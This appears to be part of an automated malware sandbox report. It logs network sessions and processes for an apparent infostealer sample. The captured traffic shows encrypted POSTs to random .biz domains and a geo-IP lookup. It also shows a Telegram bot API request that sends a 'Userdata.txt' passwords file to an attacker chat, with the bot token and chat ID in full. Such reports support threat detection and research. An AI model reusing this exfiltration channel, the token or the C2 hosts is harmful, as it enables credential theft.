                                                                                                                                                        Data Raw: 33 64 62 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 71 75 44 46 45 54 58 52 6e 30 48 72 30 35 66 55 50 37 45 4a 54 37 37 78 59 6e 50 6d 52 62 70 4d 79 34 76 6b 38 4b 59 69 48 6e 6b 4e 70 65 64 6e 6a 4f 41 4e 4a 63 61 58 44 58 63 4b 51 4a 4e 30 6e 58 4b 5a 4a 4c 37 54 63 69 4a 44 38 41 6f 48 58 4b 31 35 38 43 41 77 45 41 41 51 3d 3d 5f 66 50 6c 75 54 6f 77 48 75 52 4a 52 2f 41 30 7a 4d 79 5a 4b 32 33 44 74 43 38 4a 69 47 6e 52 46 45 34 50 58 52 71 47 57 6a 78 79 7a 70 49 5a 6f 4d 43 43 67 59 36 33 2b 6c 59 45 4c 43 51 33 70 54 50 58 5a 7a 41 31 6c 75 69 78 67 66 47 74 76 38 78 4a 46 70 41 3d 3d 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 [TRUNCATED]
                                                                                                                                                        Data Ascii: 3db2<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_fPluTowHuRJR/A0zMyZK23DtC8JiGnRFE4PXRqGWjxyzpIZoMCCgY63+lYELCQ3pTPXZzA1luixgfGtv8xJFpA==" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta name="vie


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        10192.168.2.114972018.141.10.107806760C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 10, 2025 21:41:36.403197050 CET350OUTPOST /ebncgq HTTP/1.1
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Host: knjghuig.biz
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                        Content-Length: 850
                                                                                                                                                        Jan 10, 2025 21:41:36.403213978 CET850OUTData Raw: 03 60 a8 e3 69 e9 27 61 46 03 00 00 63 f4 93 bb 78 48 37 7d 28 17 70 be e8 a1 c9 17 23 62 65 15 29 93 89 61 5d cb 0e 60 eb bd 22 3f 85 a0 d3 42 c3 91 d1 21 9b 32 82 7a 8d 5f ed 55 8f 45 96 e2 e7 3f ab ca a0 d3 5b cd e9 31 09 4d 00 af 86 f7 e2 2a
                                                                                                                                                        Data Ascii: `i'aFcxH7}(p#be)a]`"?B!2z_UE?[1M*z>21/;o6~:U_.oEiy<Ov#90 4T,CiCW:[9/!UEN}ar. .Ain'q7#}B/|ED)


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        11192.168.2.114972118.141.10.107806760C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 10, 2025 21:41:37.704047918 CET352OUTPOST /wmfptllh HTTP/1.1
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Host: knjghuig.biz
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                        Content-Length: 850
                                                                                                                                                        Jan 10, 2025 21:41:37.704093933 CET850OUTData Raw: d7 96 64 49 61 b5 10 67 46 03 00 00 0e 2d d6 e6 d4 df 9f 06 d0 1d 6e b8 ec c6 a9 55 4d 0c c6 5c 9a 78 99 e6 1a 65 6b 59 bf 62 fd 6f 23 63 d8 f2 46 98 76 9f 2a 95 5a 41 9e 6a bf d8 84 1a 7f 1f e4 96 92 3d fa 9b f5 c2 1f 1a 08 85 5f da 2e d1 ac 74
                                                                                                                                                        Data Ascii: dIagF-nUM\xekYbo#cFv*ZAj=_.thxEI'q#}Jf3!D'Z3ZR G=D)$-k>sX1RhDE4%93d53wIW)]T{(&<>OV$x|{
                                                                                                                                                        Jan 10, 2025 21:41:39.103491068 CET412INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx
                                                                                                                                                        Date: Fri, 10 Jan 2025 20:41:38 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Set-Cookie: btst=13a1688657557e01ade43d400867a228|8.46.123.189|1736541698|1736541698|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        12192.168.2.114972282.112.184.197806760C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 10, 2025 21:41:39.457382917 CET346OUTPOST /xuri HTTP/1.1
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Host: lpuegx.biz
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                        Content-Length: 850
                                                                                                                                                        Jan 10, 2025 21:41:39.457396984 CET850OUTData Raw: c1 d4 7a 55 0a 0c d7 71 46 03 00 00 a5 b6 93 04 f3 e9 47 79 cb 84 13 91 0d 13 c5 86 9b 2a 9b c7 81 5b 5c 9b 5e 5a 91 cb 6a a6 be ea 2a f7 bb 85 5d 7e f7 25 eb 0d a4 4f 90 70 02 b4 1d c5 2b aa 9f 09 cf 38 2a 5b 1a 23 65 6f a7 7d a6 84 ff 55 a2 d7
                                                                                                                                                        Data Ascii: zUqFGy*[\^Zj*]~%Op+8*[#eo}UGCXYH@3c#R+lV*A2s[H06<@pJ~,!F+gE;bMKU)huB4c HQ=Y~5N `y~0%J:chHY


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        13192.168.2.114981382.112.184.197806760C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 10, 2025 21:42:01.433628082 CET354OUTPOST /jnemakkqdmxs HTTP/1.1
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Host: lpuegx.biz
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                        Content-Length: 850
                                                                                                                                                        Jan 10, 2025 21:42:01.433671951 CET850OUTData Raw: 9b 44 7e 5d 8a 59 d8 c1 46 03 00 00 30 c1 c4 be 57 1b fe 77 f5 0a 57 94 f4 94 9e 01 d3 26 ee b4 1a 7f 14 c9 5b 74 87 d4 de 2f 80 30 aa 97 7e bd 3f 69 18 b2 11 1f b7 c1 83 90 cc 33 7d 70 fd 45 99 1f 2b 7a be a4 f5 f6 3f 32 e6 bd 60 7a 77 07 91 ba
                                                                                                                                                        Data Ascii: D~]YF0WwW&[t/0~?i3}pE+z?2`zw[rGW5:{YIE5s:a4\~3/d/+<y=+@B*+JXYrDmY+C32+jN=2>#kXO~f$,u


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        14192.168.2.114994282.112.184.197806760C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 10, 2025 21:42:22.777595997 CET356OUTPOST /bcwwcxayhua HTTP/1.1
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Host: vjaxhpbji.biz
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                        Content-Length: 850
                                                                                                                                                        Jan 10, 2025 21:42:22.777622938 CET850OUTData Raw: 0b 0f 7a 45 70 3c 1e 13 46 03 00 00 dd 46 d7 b2 f8 62 5e 69 29 49 59 bc 72 47 47 51 8f c6 a8 60 69 96 74 0f 15 08 c9 fa 31 2a 8a 2a 6b 60 b0 76 0f b5 70 09 4f 4e 5f 08 ff 0a d4 d6 79 31 d7 f5 b1 0a fb 06 53 2e af 47 5e ba 1f df ca 96 a2 d0 59 a2
                                                                                                                                                        Data Ascii: zEp<FFb^i)IYrGGQ`it1**k`vpON_y1S.G^Yx{28Br;UvD%SO[1c)cHOh1Sl2~clbw!Ai<"z}cep!KznwGH"_4i^;


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        15192.168.2.114999082.112.184.197806760C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 10, 2025 21:42:44.891060114 CET361OUTPOST /rgnicitetktmnuug HTTP/1.1
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Host: vjaxhpbji.biz
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                        Content-Length: 850
                                                                                                                                                        Jan 10, 2025 21:42:44.891087055 CET850OUTData Raw: 2f 82 99 54 8d 4f b5 b1 46 03 00 00 55 0e 1e 70 86 7d 13 1f 10 a6 24 19 dd f6 2c 3b f9 f9 e9 a6 19 a0 53 05 8c a8 0b 6a 89 b4 13 1e 9b 34 da 5e fe 52 6a cc e3 ab c7 f5 ec dc c5 d5 cb 5d 7f 2a c9 f3 ea 10 ac a3 56 60 f1 49 bb cd 57 d7 4a 77 e3 ff
                                                                                                                                                        Data Ascii: /TOFUp}$,;Sj4^Rj]*V`IWJwK0</K4?Nbpoh]Yy!]6' b~[h<IZl0bb/8>C_w&qLqKZYlTrj1CzWS[0"qsDN


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        0192.168.2.1149706104.21.64.14434068C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2025-01-10 20:40:55 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2025-01-10 20:40:55 UTC869INHTTP/1.1 200 OK
                                                                                                                                                        Date: Fri, 10 Jan 2025 20:40:55 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Age: 1856444
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n6ytFjVqt9gPGH%2BQHt6WfL35Cle%2Fn%2F0bAxsPR7z%2F%2BWdTXW71CpBe2O95O5%2BVLy7Twpzdv%2FIGdWVaDRSbt1yUN4LoTFTk34VGhx%2FcLymdcjIFaHW0pxEST21Cyx5e%2Bn%2F7xd8SSZeg"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8fff7c249cbbde95-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1713&min_rtt=1606&rtt_var=817&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1184584&cwnd=243&unsent_bytes=0&cid=c481b55eaece08be&ts=217&x=0"
                                                                                                                                                        2025-01-10 20:40:55 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        1192.168.2.1149711149.154.167.2204434068C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2025-01-10 20:41:03 UTC295OUTPOST /bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613755033&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                                        Content-Type: multipart/form-data; boundary================8dd318d2fbe638d
                                                                                                                                                        Host: api.telegram.org
                                                                                                                                                        Content-Length: 1090
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2025-01-10 20:41:03 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 38 64 32 66 62 65 36 33 38 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                        Data Ascii: --===============8dd318d2fbe638dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                                        2025-01-10 20:41:04 UTC388INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0
                                                                                                                                                        Date: Fri, 10 Jan 2025 20:41:04 GMT
                                                                                                                                                        Content-Type: application/json
                                                                                                                                                        Content-Length: 515
                                                                                                                                                        Connection: close
                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                        2025-01-10 20:41:04 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 39 36 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 34 37 31 34 31 35 36 33 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6f 6c 75 77 61 6d 69 6d 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6f 6c 75 77 61 6d 69 6d 73 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 31 33 37 35 35 30 33 33 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 69 6d 73 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 36 36 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 2c 22 6d 69 6d 65 5f 74
                                                                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":2960,"from":{"id":7471415635,"is_bot":true,"first_name":"oluwamims","username":"oluwamimsBot"},"chat":{"id":1613755033,"first_name":"Mims","type":"private"},"date":1736541664,"document":{"file_name":"Userdata.txt","mime_t


                                                                                                                                                        Click to jump to process

                                                                                                                                                        Click to jump to process

                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                        Click to jump to process

                                                                                                                                                        Target ID:0
                                                                                                                                                        Start time:15:40:38
                                                                                                                                                        Start date:10/01/2025
                                                                                                                                                        Path:C:\Users\user\Desktop\SABXJ1B5c8.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Users\user\Desktop\SABXJ1B5c8.exe"
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:1'566'208 bytes
                                                                                                                                                        MD5 hash:5742AB086DC8F6E149625CB4AF899678
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:2
                                                                                                                                                        Start time:15:40:39
                                                                                                                                                        Start date:10/01/2025
                                                                                                                                                        Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:1'445'888 bytes
                                                                                                                                                        MD5 hash:E5F7971641A9B95E117EDC9226944C29
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Antivirus matches:
                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:false

                                                                                                                                                        Target ID:3
                                                                                                                                                        Start time:15:40:40
                                                                                                                                                        Start date:10/01/2025
                                                                                                                                                        Path:C:\Windows\System32\alg.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\System32\alg.exe
                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                        File size:1'381'376 bytes
                                                                                                                                                        MD5 hash:135921C8C6E6F42106E2AC61EE0D0612
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:false

                                                                                                                                                        Target ID:4
                                                                                                                                                        Start time:15:40:42
                                                                                                                                                        Start date:10/01/2025
                                                                                                                                                        Path:C:\Windows\System32\drivers\AppVStrm.sys
                                                                                                                                                        Wow64 process (32bit):
                                                                                                                                                        Commandline:
                                                                                                                                                        Imagebase:
                                                                                                                                                        File size:138'056 bytes
                                                                                                                                                        MD5 hash:BDA55F89B69757320BC125FF1CB53B26
                                                                                                                                                        Has elevated privileges:
                                                                                                                                                        Has administrator privileges:
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:moderate
                                                                                                                                                        Has exited:false

                                                                                                                                                        Target ID:5
                                                                                                                                                        Start time:15:40:42
                                                                                                                                                        Start date:10/01/2025
                                                                                                                                                        Path:C:\Windows\System32\drivers\AppvVemgr.sys
                                                                                                                                                        Wow64 process (32bit):
                                                                                                                                                        Commandline:
                                                                                                                                                        Imagebase:
                                                                                                                                                        File size:174'408 bytes
                                                                                                                                                        MD5 hash:E70EE9B57F8D771E2F4D6E6B535F6757
                                                                                                                                                        Has elevated privileges:
                                                                                                                                                        Has administrator privileges:
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:moderate
                                                                                                                                                        Has exited:false

                                                                                                                                                        Target ID:6
                                                                                                                                                        Start time:15:40:42
                                                                                                                                                        Start date:10/01/2025
                                                                                                                                                        Path:C:\Windows\System32\drivers\AppvVfs.sys
                                                                                                                                                        Wow64 process (32bit):
                                                                                                                                                        Commandline:
                                                                                                                                                        Imagebase:
                                                                                                                                                        File size:154'952 bytes
                                                                                                                                                        MD5 hash:2CBABD729D5E746B6BD8DC1B4B4DB1E1
                                                                                                                                                        Has elevated privileges:
                                                                                                                                                        Has administrator privileges:
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:moderate
                                                                                                                                                        Has exited:false

                                                                                                                                                        Target ID:7
                                                                                                                                                        Start time:15:40:42
                                                                                                                                                        Start date:10/01/2025
                                                                                                                                                        Path:C:\Windows\System32\AppVClient.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\AppVClient.exe
                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                        File size:1'348'608 bytes
                                                                                                                                                        MD5 hash:0E6695AE9B36C10F1BA14DBAD66572E9
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:9
                                                                                                                                                        Start time:15:40:43
                                                                                                                                                        Start date:10/01/2025
                                                                                                                                                        Path:C:\Windows\System32\FXSSVC.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\fxssvc.exe
                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                        File size:1'242'624 bytes
                                                                                                                                                        MD5 hash:E72AE34F3044B7578B086D583E378596
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:10
                                                                                                                                                        Start time:15:40:46
                                                                                                                                                        Start date:10/01/2025
                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                        File size:2'354'176 bytes
                                                                                                                                                        MD5 hash:F658B7D7CBCE308B133C9A2238E1C99E
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:false

                                                                                                                                                        Target ID:11
                                                                                                                                                        Start time:15:40:47
                                                                                                                                                        Start date:10/01/2025
                                                                                                                                                        Path:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                        File size:1'512'448 bytes
                                                                                                                                                        MD5 hash:DE04250FA2299A6D9B6C11E1BF4926F3
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:12
                                                                                                                                                        Start time:15:40:47
                                                                                                                                                        Start date:10/01/2025
                                                                                                                                                        Path:C:\Windows\System32\msdtc.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\System32\msdtc.exe
                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                        File size:1'434'112 bytes
                                                                                                                                                        MD5 hash:077870CDAFB7A6CEE9112FA39CCF50BF
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:false

                                                                                                                                                        Target ID:13
                                                                                                                                                        Start time:15:40:47
                                                                                                                                                        Start date:10/01/2025
                                                                                                                                                        Path:C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                        File size:1'391'616 bytes
                                                                                                                                                        MD5 hash:3D61E604A56C70F50B3C6D3E307619E6
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:false

                                                                                                                                                        Target ID:14
                                                                                                                                                        Start time:15:40:48
                                                                                                                                                        Start date:10/01/2025
                                                                                                                                                        Path:C:\Windows\SysWOW64\perfhost.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Windows\SysWow64\perfhost.exe
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:1'306'624 bytes
                                                                                                                                                        MD5 hash:D2EB808FBCC7D13A4EA0C8C57F14F0DF
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:false

                                                                                                                                                        Target ID:15
                                                                                                                                                        Start time:15:40:48
                                                                                                                                                        Start date:10/01/2025
                                                                                                                                                        Path:C:\Windows\System32\Locator.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\locator.exe
                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                        File size:1'296'896 bytes
